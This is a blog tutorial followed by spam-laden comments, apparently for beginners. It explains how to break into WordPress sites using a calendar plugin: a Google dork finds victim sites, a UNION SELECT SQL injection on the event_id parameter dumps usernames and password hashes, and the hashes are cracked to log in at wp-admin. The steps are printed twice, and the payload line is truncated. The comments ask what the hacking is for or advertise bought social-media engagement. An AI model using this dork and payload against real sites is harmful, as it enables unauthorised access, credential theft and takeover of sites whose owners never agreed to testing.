WP Calender is vulnerable to sql injection in wordpress. So Follow my instruction.
1. Go to www.google.com
2. Dork:"powered by WordPress" inurl:"/?event_id="
Search it google and select anyone in a new tab which you comfortable.
3. Now after 'id=' use the code which is given below.
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
4. You get the username and password. Password are in hash form. Decrypt the Hash.
5. You can login in www.site.com/wp-admin
I hope you enjoy the tutorial. :-)
1. Go to www.google.com
2. Dork:"powered by WordPress" inurl:"/?event_id="
Search it google and select anyone in a new tab which you comfortable.
3. Now after 'id=' use the code which is given below.
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
4. You get the username and password. Password are in hash form. Decrypt the Hash.
5. You can login in www.site.com/wp-admin
I hope you enjoy the tutorial. :-)
yes i am impresing by your article but look like to be difficult and what is the use of this hacking? please give the details about it.
ReplyDeletehey you provide the article but look like to be difficult and what is the use of this hacking of a wordpress blog ? please give in detail the actual work is done through this hacking.
ReplyDeleteThat is very helpful for increasing my knowledge in this field. autoblog wordpress website
ReplyDeleteYou are very articulate and explain your ideas and opinions clearly leaving no room for miscommunication.
ReplyDeletePlease Kindly check My web: buy youtube comments
You are very articulate and explain your ideas and opinions clearly leaving no room for miscommunication.Please Kindly check My web:convert youtube video
ReplyDeleteYou are very articulate and explain your ideas and opinions clearly leaving no room for miscommunication.Please Kindly check My web:"buy tiktok comments''
ReplyDelete